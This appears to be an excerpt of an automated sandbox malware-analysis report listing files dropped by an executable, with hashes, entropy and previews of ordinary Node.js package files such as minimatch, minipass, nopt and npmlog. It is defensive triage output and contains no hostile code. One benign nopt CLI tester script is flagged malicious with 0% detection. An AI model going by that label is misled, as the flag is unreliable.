              Size (bytes):1873
              Entropy (8bit):4.689702364154976
              Encrypted:false
              SSDEEP:
              MD5:65C6CA2E4E85730A4FE080398F39C2EE
              SHA1:9321BCC4FE511D96901F622CE708D294097DD725
              SHA-256:3EEA242409743D7E3CE5231FAAACA9BAFB868DDEA3D8818DD5B733E700C4518B
              SHA-512:12A01F94D65634854FE570E4CE062AC435F759CDE541986A7BE31BC7EB88EB9D9EE9C37E9C8A314211A15AC611289DE28EAB5905B53367D67D483C226873B032
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "make-fetch-happen",. "version": "11.1.1",. "description": "Opinionated, caching, retrying fetch client",. "main": "lib/index.js",. "files": [. "bin/",. "lib/". ],. "scripts": {. "test": "tap",. "posttest": "npm run lint",. "eslint": "eslint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "postlint": "template-oss-check",. "snap": "tap",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/make-fetch-happen.git". },. "keywords": [. "http",. "request",. "fetch",. "mean girls",. "caching",. "cache",. "subresource integrity". ],. "author": "GitHub Inc.",. "license": "ISC",. "dependencies": {. "agentkeepalive": "^4.2.1",. "cacache": "^17.0.0",. "http-cache-semantics": "^4.1.1",. "http-proxy-agent": "^5.0.0",. "https-proxy-agent": "^5.0.0",. "is-lambda": "^1.0.1",. "lru-cache": "^7.7.1",. "minipa
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):26266
              Entropy (8bit):4.647651141871224
              Encrypted:false
              SSDEEP:
              MD5:43855BAA9189D8DD645C44AFC4132EC1
              SHA1:F21A6B3C6D1D71BB65E4E6E0AF1BF1BABA3A207E
              SHA-256:EBAE64A212004E293FD7B536F33A2CA830452F71377F4B51FA0A0E9885EE6A93
              SHA-512:B67A9875C4C70C765C00E24D02EE807C22099C66CE1CE41FFCA4F47D53DEAAE0C2C9A39E19EAA42A94C31B937888681F945DA3704F3E6E1A3E0711BDA00AD77F
              Malicious:false
              Reputation:unknown
              Preview:module.exports = minimatch.minimatch.Minimatch = Minimatch..var path = (function () { try { return require('path') } catch (e) {}}()) || {. sep: '/'.}.minimatch.sep = path.sep..var GLOBSTAR = minimatch.GLOBSTAR = Minimatch.GLOBSTAR = {}.var expand = require('brace-expansion')..var plTypes = {. '!': { open: '(?:(?!(?:', close: '))[^/]*?)'},. '?': { open: '(?:', close: ')?' },. '+': { open: '(?:', close: ')+' },. '*': { open: '(?:', close: ')*' },. '@': { open: '(?:', close: ')' }.}..// any single thing other than /.// don't need to escape / when using new RegExp().var qmark = '[^/]'..// * => any number of characters.var star = qmark + '*?'..// ** when dots are allowed. Anything goes, except .. and ..// not (^ or / followed by one or two dots followed by $ or /),.// followed by anything, any number of times..var twoStarDot = '(?:(?!(?:\\\/|^)(?:\\.{1,2})($|\\\/)).)*?'..// not a ^ or / followed by a dot,.// followed by anything, any number of times..var twoStarNoDot = '(?:(?!(?:\\\
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):700
              Entropy (8bit):4.613065336514549
              Encrypted:false
              SSDEEP:
              MD5:9F31A54EF78D345B4D57907429129CD7
              SHA1:497003D0B7F274DD0B3BC185A6EA60657933270D
              SHA-256:AB02F4767ADC32C3CED28703BF7F5A57FEE72B638B582850A647770D12E5DBE7
              SHA-512:24144B4624231200C7E50B47649FE94E048D5079B971C9888B6F044232DB5E520D07E83C332DF57ADF578298934AE093888069CE408DD57C400426C9172D601B
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me)",. "name": "minimatch",. "description": "a glob matcher in javascript",. "version": "3.1.2",. "publishConfig": {. "tag": "v3-legacy". },. "repository": {. "type": "git",. "url": "git://github.com/isaacs/minimatch.git". },. "main": "minimatch.js",. "scripts": {. "test": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --all; git push origin --tags". },. "engines": {. "node": "*". },. "dependencies": {. "brace-expansion": "^1.1.7". },. "devDependencies": {. "tap": "^15.1.6". },. "license": "ISC",. "files": [. "minimatch.js". ].}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):18551
              Entropy (8bit):4.940972095945771
              Encrypted:false
              SSDEEP:
              MD5:439CBB62BB943197D075E274E10C2C03
              SHA1:EB32092D134F2ADE8C9D95A3850E5C394B2A83A5
              SHA-256:CADA1F100F58D05055AFEAD733EC4BDB743E1E3333AB0E899A24F50C88C20CCE
              SHA-512:84E4018D39E0E99253B5E312A026B31F31146E18565FDC440CAADFBD1B99ACC1EAC453FD3E951FAB8D789DA21A2B68D3159E9776A9A26D883F953F4858CA753A
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const proc =. typeof process === 'object' && process. ? process. : {. stdout: null,. stderr: null,. }.const EE = require('events').const Stream = require('stream').const stringdecoder = require('string_decoder').const SD = stringdecoder.StringDecoder..const EOF = Symbol('EOF').const MAYBE_EMIT_END = Symbol('maybeEmitEnd').const EMITTED_END = Symbol('emittedEnd').const EMITTING_END = Symbol('emittingEnd').const EMITTED_ERROR = Symbol('emittedError').const CLOSED = Symbol('closed').const READ = Symbol('read').const FLUSH = Symbol('flush').const FLUSHCHUNK = Symbol('flushChunk').const ENCODING = Symbol('encoding').const DECODER = Symbol('decoder').const FLOWING = Symbol('flowing').const PAUSED = Symbol('paused').const RESUME = Symbol('resume').const BUFFER = Symbol('buffer').const PIPES = Symbol('pipes').const BUFFERLENGTH = Symbol('bufferLength').const BUFFERPUSH = Symbol('bufferPush').const BUFFERSHIFT = Symbol('bufferShift').const OBJECTMODE = Sym
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):18516
              Entropy (8bit):4.939849339666677
              Encrypted:false
              SSDEEP:
              MD5:55A53EE6E25AC34ED76B06FB810F779D
              SHA1:4FBBE5A6EBFB97649354BE366F3FE10E790C6AAE
              SHA-256:00610CFD77DAD5AA627D77F31362D4BA0F0A7DB96902CAF15451C9C637DD8D9E
              SHA-512:9E4519BACBEFF53B39E0E100D28E933624CE5D1847A456C388B66B74F24ED28FFCA2FA4026A902B420C598E07B8981146C026A3BB5032253EE1FDBD2A3FAF4FC
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const proc =. typeof process === 'object' && process. ? process. : {. stdout: null,. stderr: null,. }.import EE from 'events'.import Stream from 'stream'.import stringdecoder from 'string_decoder'.const SD = stringdecoder.StringDecoder..const EOF = Symbol('EOF').const MAYBE_EMIT_END = Symbol('maybeEmitEnd').const EMITTED_END = Symbol('emittedEnd').const EMITTING_END = Symbol('emittingEnd').const EMITTED_ERROR = Symbol('emittedError').const CLOSED = Symbol('closed').const READ = Symbol('read').const FLUSH = Symbol('flush').const FLUSHCHUNK = Symbol('flushChunk').const ENCODING = Symbol('encoding').const DECODER = Symbol('decoder').const FLOWING = Symbol('flowing').const PAUSED = Symbol('paused').const RESUME = Symbol('resume').const BUFFER = Symbol('buffer').const PIPES = Symbol('pipes').const BUFFERLENGTH = Symbol('bufferLength').const BUFFERPUSH = Symbol('bufferPush').const BUFFERSHIFT = Symbol('bufferShift').const OBJECTMODE = Symbol('objectMode
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1745
              Entropy (8bit):4.604602560624711
              Encrypted:false
              SSDEEP:
              MD5:0073FF5B8B418F84C67EDD912FFAB39E
              SHA1:F351144CAFB23A2E78D442708FCBCFDCD4C5420F
              SHA-256:280AF43113A60826E63A6BF79E115FDF5F89D5866F663CDDE3D229640671CEE1
              SHA-512:EAF4015AA2E5A705E85EDF3761C0B23DAF8232D71CE30C508832AB0EF45A0B211B2DEEF468AE4FAAA52EC701A36F485A3E50D035373345267B9041F585A1B242
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass",. "version": "5.0.0",. "description": "minimal implementation of a PassThrough stream",. "main": "./index.js",. "module": "./index.mjs",. "types": "./index.d.ts",. "exports": {. ".": {. "import": {. "types": "./index.d.ts",. "default": "./index.mjs". },. "require": {. "types": "./index.d.ts",. "default": "./index.js". }. },. "./package.json": "./package.json". },. "devDependencies": {. "@types/node": "^17.0.41",. "end-of-stream": "^1.4.0",. "node-abort-controller": "^3.1.1",. "prettier": "^2.6.2",. "tap": "^16.2.0",. "through2": "^2.0.3",. "ts-node": "^10.8.1",. "typedoc": "^0.23.24",. "typescript": "^4.7.3". },. "scripts": {. "pretest": "npm run prepare",. "presnap": "npm run prepare",. "prepare": "node ./scripts/transpile-to-esm.js",. "snap": "tap",. "test": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git pu
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):1210
              Entropy (8bit):4.8272286436117335
              Encrypted:false
              SSDEEP:
              MD5:6E4A5D7619F6D18F00888D9F4303A75D
              SHA1:C48A7380AD4BB7057A678B1011151165FC005DCB
              SHA-256:2C1F1EEEA26BDF3CCD16FFB76EB79217635807662FDEA326D9244FBE137F50DC
              SHA-512:CD7142CF19E11885D25B308C7099CBE326275B9C02FD10F3173681E3C1DDCE43DA8E6D1DD79E41F669EF2277C5CDFF38D1B5623429FDD6F967CF18E1F60FC8FE
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node.var nopt = require('../lib/nopt').var path = require('path').var types = { num: Number,. bool: Boolean,. help: Boolean,. list: Array,. 'num-list': [Number, Array],. 'str-list': [String, Array],. 'bool-list': [Boolean, Array],. str: String,. clear: Boolean,. config: Boolean,. length: Number,. file: path,.}.var shorthands = { s: ['--str', 'astring'],. b: ['--bool'],. nb: ['--no-bool'],. tft: ['--bool-list', '--no-bool-list', '--bool-list', 'true'],. '?': ['--help'],. h: ['--help'],. H: ['--help'],. n: ['--num', '125'],. c: ['--config'],. l: ['--length'],. f: ['--file'],.}.var parsed = nopt(types. , shorthands. , process.argv. , 2)..console.log('parsed', parsed)..if (parsed.help) {. console.log(''). console.log('nopt cli tester'). console.log(''). console.log('types'). console.log(Object.keys(types).map(function M (t) {. var type = types[t]. if (Array.isArray(type)) {. return [t, type.map(function (mappedType) {. return ma
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):13078
              Entropy (8bit):4.6229590748432186
              Encrypted:false
              SSDEEP:
              MD5:BDB0F3A99A5D300C653DD6028F581662
              SHA1:A6E7A110A241F6D4B180B3D542A2760D960FF412
              SHA-256:6FE22FE556D30962082D1AFCF23D85F115633528A0BDCC8493866E49D522998E
              SHA-512:D85B3A7C6B15DB5239234F8BD5DEFECFE9EBB633FB774A06EF5C697F4544A77536454964F5CCDA1E7646484B3038CFCA48610A79CF061B16A28F144D41BD9067
              Malicious:false
              Reputation:unknown
              Preview:// info about each config option...var debug = process.env.DEBUG_NOPT || process.env.NOPT_DEBUG. ? function () {. console.error.apply(console, arguments). }. : function () {}..var url = require('url').var path = require('path').var Stream = require('stream').Stream.var abbrev = require('abbrev').var os = require('os')..module.exports = exports = nopt.exports.clean = clean..exports.typeDefs =. { String: { type: String, validate: validateString },. Boolean: { type: Boolean, validate: validateBoolean },. url: { type: url, validate: validateUrl },. Number: { type: Number, validate: validateNumber },. path: { type: path, validate: validatePath },. Stream: { type: Stream, validate: validateStream },. Date: { type: Date, validate: validateDate },. }..function nopt (types, shorthands, args, slice) {. args = args || process.argv. types = types || {}. shorthands = shorthands || {}. if (typeof slice !== 'number') {. slice = 2. }.. debug(types, shorthands, args,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1275
              Entropy (8bit):4.68227083078406
              Encrypted:false
              SSDEEP:
              MD5:F62F46708449924FD610AEE9DC6D55AD
              SHA1:B7DF729E3080F74B3513E982F8588D636D28E27E
              SHA-256:48832CC00086A107923C1371C873327B678B2283F3E9C3312B93B64731AD4A2A
              SHA-512:993F0FD832B6559E10ED8CBD6F64C3F47D927F68712212941A98336840FE199862A09BBAB7EB0686B73F31B6D855D7300A5A80ECB9362A51BDEA545AE1B680EB
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "nopt",. "version": "6.0.0",. "description": "Option parsing for Node, supporting types, shorthands, etc. Used by npm.",. "author": "GitHub Inc.",. "main": "lib/nopt.js",. "scripts": {. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/nopt.git". },. "bin": {. "nopt": "bin/nopt.js". },. "license": "ISC",. "dependencies": {. "abbrev": "^1.0.0". },. "devDependencies": {. "@npmcli/eslint-config": "^3.0.1",. "@npmcli/template-oss": "3.5.0",. "tap": "^16.3.0". },. "tap": {. "lines": 87,. "functions": 91,. "branches": 81,. "statements": 87. },. "files": [. "bi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):9046
              Entropy (8bit):4.82525261908316
              Encrypted:false
              SSDEEP:
              MD5:81FF49D59D662E2245BA149979CB4CE4
              SHA1:2C23B35F6DCBE62C41140ED4BE9EC564823FBA57
              SHA-256:7BC9C50016867FB92C6812A0AAF1D71B358574A570ACE0122D622E4926CF0657
              SHA-512:A99F591F4F2F95CF3B4A481009C86850B2C78BAA5D34E83428B1DEAA10BDD03572ACF45A0B700E9DC4BF47DF47DAB83E3416DCD84D118FB2DA6FA0280DBD7085
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var Progress = require('are-we-there-yet').var Gauge = require('gauge').var EE = require('events').EventEmitter.var log = exports = module.exports = new EE().var util = require('util')..var setBlocking = require('set-blocking').var consoleControl = require('console-control-strings')..setBlocking(true).var stream = process.stderr.Object.defineProperty(log, 'stream', {. set: function (newStream) {. stream = newStream. if (this.gauge) {. this.gauge.setWriteTo(stream, stream). }. },. get: function () {. return stream. },.})..// by default, decide based on tty-ness..var colorEnabled.log.useColor = function () {. return colorEnabled != null ? colorEnabled : stream.isTTY.}..log.enableColor = function () {. colorEnabled = true. this.gauge.setTheme({ hasColor: colorEnabled, hasUnicode: unicodeEnabled }).}.log.disableColor = function () {. colorEnabled = false. this.gauge.setTheme({ hasColor: colorEnabled, hasUnicode: unicodeEnabled }).}..// default level.l
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1269
              Entropy (8bit):4.680184378817778
              Encrypted:false
              SSDEEP:
              MD5:AED784C1DA2C3405AB39C54EF3C25E86
              SHA1:41BC0FCEE7AD3AB38C8DE1C030A849AF36BBB262
              SHA-256:13B247DA6685D68BBBB6DA390709FEE7A2D6CE0658095BBC921BA31C1CBD86FA
              SHA-512:19713F66F455353CBF30F63911F70DA323922CA3B6CA208F7E74D8A21B01622A120936F104F5594F6F7F4536D87B75759E8212126F794BFC3A2F219B7E89C0FC
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "GitHub Inc.",. "name": "npmlog",. "description": "logger for npm",. "version": "6.0.2",. "repository": {. "type": "git",. "url": "https://github.com/npm/npmlog.git". },. "main": "lib/log.js",. "files": [. "bin/",. "lib/". ],. "scripts": {. "test": "tap",. "npmclilint": "npmcli-lint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "postsnap": "npm run lintfix --",. "postlint": "template-oss-check",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "snap": "tap",. "template-oss-apply": "template-oss-apply --force". },. "dependencies": {. "are-we-there-yet": "^3.0.0",. "console-control-strings": "^1.1.0",. "gauge": "^4.0.3",. "set-blocking": "^2.0.0". },. "devDependencies": {. "@npmcli/eslint-config": "^3.0.1",. "@npmcli/template-oss": "3.4.1",. "tap": "^16.0.1". },. "license": "IS
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1443
              Entropy (8bit):4.636320036171633
              Encrypted:false
              SSDEEP:
              MD5:08365B138B43284489ECFBF6EFD44A25
              SHA1:1B97E91AC67FCBBD711DEDD3B5C388C08489EEAA
              SHA-256:56E4E12A6934A2C4D36C7BF893F4D8AEFA6C96F9FFCEC357DFA6476E36C4F1F5
              SHA-512:85494CA6582DB6AA3679F532C540F2075516628C02ABD6FC827369CF8EC1F2AC66092FF815406D4670C7A33CADC62F34C2C478136953656CE85A7D5755F8C31E
              Malicious:false
              Reputation:unknown
              Preview:# Developer's Certificate of Origin 1.1..By making a contribution to this project, I certify that:..* (a) The contribution was created in whole or in part by me and I. have the right to submit it under the open source license. indicated in the file; or..* (b) The contribution is based upon previous work that, to the best. of my knowledge, is covered under an appropriate open source. license and I have the right under that license to submit that. work with modifications, whether created in whole or in part. by me, under the same open source license (unless I am. permitted to submit under a different license), as indicated. in the file; or..* (c) The contribution was provided directly to me by some other. person who certified (a), (b) or (c) and I have not modified. it...* (d) I understand and agree that this project and the contribution. are public and that a record of the contribution (including all. personal information I submit with it, including my sign-off) is. maintai
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5550
              Entropy (8bit):4.5703149075149225
              Encrypted:false
              SSDEEP:
              MD5:70B44945CEC4643CA805D87F673FBD34
              SHA1:F30FD9BA0FA4F12C900D1B7BB248AA568A72CC3C
              SHA-256:7A521E462D1C6F3B599C44637FB337BBF969DDA311510A87236EC539A415331D
              SHA-512:586F0F2A46AE29E8DC0B5931E144D3B7536057CB0A6D2ECFC72544C5048A1FC9417D14FBDB45F33E21EEF99A2A0E302A3C74D2F8E360573544C8328593053DAA
              Malicious:false
              Reputation:unknown
              Preview:### Streams Working Group..The Node.js Streams is jointly governed by a Working Group.(WG).that is responsible for high-level guidance of the project...The WG has final authority over this project including:..* Technical direction.* Project governance and process (including this policy).* Contribution policy.* GitHub repository hosting.* Conduct guidelines.* Maintaining the list of additional Collaborators..For the current list of WG members, see the project.[README.md](./README.md#current-project-team-members)...### Collaborators..The readable-stream GitHub repository is.maintained by the WG and additional Collaborators who are added by the.WG on an ongoing basis...Individuals making significant and valuable contributions are made.Collaborators and given commit-access to the project. These.individuals are identified by the WG and their addition as.Collaborators is discussed during the WG meeting..._Note:_ If you make a significant contribution and are not considered.for commit-access
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2337
              Entropy (8bit):5.096887765301323
              Encrypted:false
              SSDEEP:
              MD5:A67A7926E54316D90C14F74F71080977
              SHA1:D3622FAC093FE1CBCB4D8E8D35801600B681FC45
              SHA-256:EC62DC96DA0099B87F4511736C87309335527FB7031639493E06C95728DC8C54
              SHA-512:E61DE704D5A76AFD66B5D9B1C78F0A5AFE9A846686CA2FB28C814A4A60DBE82A190ED4A6A2F31E09BF6D695B8EC178EBEA9804593029C58C1B1BEDD793324D13
              Malicious:false
              Reputation:unknown
              Preview:Node.js is licensed for use as follows:..""".Copyright Node.js contributors. All rights reserved...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4197
              Entropy (8bit):5.1451943847768815
              Encrypted:false
              SSDEEP:
              MD5:D86574A5B6F48686BCD88BE75575A5E1
              SHA1:2D9DBCF11E8B3D3A084BD408ABFDBDA5AD21F762
              SHA-256:346033597378D23E59068D120D6257F7CD85AE88C40B1F85C3329CECE0D119C4
              SHA-512:8DFD61578F9DEFDD32AD7E726FE645075189425DC083735FE71D160239F4E56BB4C8B8BBA1151B24AB4EED2FE07A80D0E342E36E173B82C99428428F0EEE57EB
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; subClass.__proto__ = superClass; }..var codes = {};..function createErrorType(code, message, Base) {. if (!Base) {. Base = Error;. }.. function getMessage(arg1, arg2, arg3) {. if (typeof message === 'string') {. return message;. } else {. return message(arg1, arg2, arg3);. }. }.. var NodeError =. /*#__PURE__*/. function (_Base) {. _inheritsLoose(NodeError, _Base);.. function NodeError(arg1, arg2, arg3) {. return _Base.call(this, getMessage(arg1, arg2, arg3)) || this;. }.. return NodeError;. }(Base);.. NodeError.prototype.name = Base.name;. NodeError.prototype.code = code;. codes[code] = NodeError;.} // https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js...function oneOf(expected, thing) {. if (Array.isArray(expected)) {. var len = expected.length;. expec
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3715
              Entropy (8bit):5.172175417125612
              Encrypted:false
              SSDEEP:
              MD5:548CC34803FB38415A833AE633B73048
              SHA1:C12A741ABE200AACC443F40633D398F1369739BB
              SHA-256:7028CCA95B2F124345BD5B816E0D8184E7B7D208FE0AA76EB38DF43E8644FD03
              SHA-512:DB6ACC32FC19EEF87AE6EE900B7284CF686D9EB980C9A8A188353652DBE6E516B59962D5C5B98C4C631DE06D1E55D53FFDFD72722D77089F91713B5E6F9EB56D
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const codes = {};..function createErrorType(code, message, Base) {. if (!Base) {. Base = Error. }.. function getMessage (arg1, arg2, arg3) {. if (typeof message === 'string') {. return message. } else {. return message(arg1, arg2, arg3). }. }.. class NodeError extends Base {. constructor (arg1, arg2, arg3) {. super(getMessage(arg1, arg2, arg3));. }. }.. NodeError.prototype.name = Base.name;. NodeError.prototype.code = code;.. codes[code] = NodeError;.}..// https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js.function oneOf(expected, thing) {. if (Array.isArray(expected)) {. const len = expected.length;. expected = expected.map((i) => String(i));. if (len > 2) {. return `one of ${thing} ${expected.slice(0, len - 1).join(', ')}, or ` +. expected[len - 1];. } else if (len === 2) {. return `one of ${thing} ${expected[0]} or ${expected[1]}`;. } else {. return `of ${thing} ${expe
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):460
              Entropy (8bit):4.55615466544518
              Encrypted:false
              SSDEEP:
              MD5:CA7FA51EBED78CB79B54099BF75D5662
              SHA1:E3F0FBE7C78388BBF9F0E4D97AB318A852DF082E
              SHA-256:5F9BEFF594347BA6765B806EC36E25699BE1407627E2EE91BE5D609E40BAACB8
              SHA-512:9F587A44A76130BEFD8ACB440C18B0176A3C5A403765C85FDC3AA56DD68FF060988B1830B97266171DAE2A26CDF42F873092A6E648D37FDEBDA3BA87AB00B784
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..var experimentalWarnings = new Set();..function emitExperimentalWarning(feature) {. if (experimentalWarnings.has(feature)) return;. var msg = feature + ' is an experimental feature. This feature could ' +. 'change at any time';. experimentalWarnings.add(feature);. process.emitWarning(msg, 'ExperimentalWarning');.}..function noop() {}..module.exports.emitExperimentalWarning = process.emitWarning. ? emitExperimentalWarning. : noop;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4381
              Entropy (8bit):5.061107219730497
              Encrypted:false
              SSDEEP:
              MD5:3E7B822C399ACB53ABC5B0A031277E4A
              SHA1:57E5B8D44C5F6C083810ABB4639A5D2684369CB4
              SHA-256:E2E55263DF344F33D016A3E051DE1A86E2206989A2162951E651E5557665954C
              SHA-512:2DA2217F7E735185130E977A3847B3C0F91277A054158CAD8B0C0432C590B792A175F329286D4C67B9E98738CA3D7D25A0452E93EBC631048CBB3F32635931C1
              Malicious:false
              Reputation:unknown
              Preview:// Copyright Joyent, Inc. and other Node contributors..//.// Permission is hereby granted, free of charge, to any person obtaining a.// copy of this software and associated documentation files (the.// "Software"), to deal in the Software without restriction, including.// without limitation the rights to use, copy, modify, merge, publish,.// distribute, sublicense, and/or sell copies of the Software, and to permit.// persons to whom the Software is furnished to do so, subject to the.// following conditions:.//.// The above copyright notice and this permission notice shall be included.// in all copies or substantial portions of the Software..//.// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN.// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,.// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1628
              Entropy (8bit):5.192417327369275
              Encrypted:false
              SSDEEP:
              MD5:03079912917033CC780DB259EC6DD815
              SHA1:0B7AB4AAF1A5034C444971DDA33DD85175BF3B7B
              SHA-256:AF6250DF6A49A0148EED8B5F2E28B2F692C3FFA9DF538A59DC716A4BD10901E2
              SHA-512:1A487AE07412F5D5BE9C092E958A76379FD0E15F45E8F7273ACEDE692E91F26E2EF8D192DADCF8B11AFA39EDED68124ADAA592FCD64D0E36131C855B9A600D8B
              Malicious:false
              Reputation:unknown
              Preview:// Copyright Joyent, Inc. and other Node contributors..//.// Permission is hereby granted, free of charge, to any person obtaining a.// copy of this software and associated documentation files (the.// "Software"), to deal in the Software without restriction, including.// without limitation the rights to use, copy, modify, merge, publish,.// distribute, sublicense, and/or sell copies of the Software, and to permit.// persons to whom the Software is furnished to do so, subject to the.// following conditions:.//.// The above copyright notice and this permission notice shall be included.// in all copies or substantial portions of the Software..//.// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN.// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,.// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):36023
              Entropy (8bit):4.8219715051732175
              Encrypted:false
              SSDEEP:
              MD5:39E30DF90F63A90F6D003C31738EC17C
              SHA1:FE2D066C4943E19A77AF1306B48E2801E56EC842
              SHA-256:9837DE8CAE91F9A80DA75368855B45C3ADA9A858983355FD873D8885CAB1C5AB
              SHA-512:4FC65AD2EAF6BD4AEC41698599437CFD0740172A25EEF3FC106C85C9B47E68B737E3982CB5D5FCFF4AA8996529AB7BFD02567A6BA6EA79043B7E0D45FFA07E72
              Malicious:false
              Reputation:unknown
              Preview:// Copyright Joyent, Inc. and other Node contributors..//.// Permission is hereby granted, free of charge, to any person obtaining a.// copy of this software and associated documentation files (the.// "Software"), to deal in the Software without restriction, including.// without limitation the rights to use, copy, modify, merge, publish,.// distribute, sublicense, and/or sell copies of the Software, and to permit.// persons to whom the Software is furnished to do so, subject to the.// following conditions:.//.// The above copyright notice and this permission notice shall be included.// in all copies or substantial portions of the Software..//.// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN.// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,.// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7936
              Entropy (8bit):5.008746139883546
              Encrypted:false
              SSDEEP:
              MD5:F88B61A833F9FED00F17A4A0352AE99E
              SHA1:1FF98CF12E4BC54A554E251B47039B5E1E16B466
              SHA-256:A2F6E6D17A74DFA75BC7B34B50546EBCB76EEB2F4AAC6D1090F80915AEE20342
              SHA-512:376DFD4F17C1BCDB9488F5AE3038CB6C0D409719818B0FA5EA3FE71CD11CB41AFA1EB06FED3FD705DA47C6A3742B0355E46242F224247A96F5757FEB9A4D98F3
              Malicious:false
              Reputation:unknown
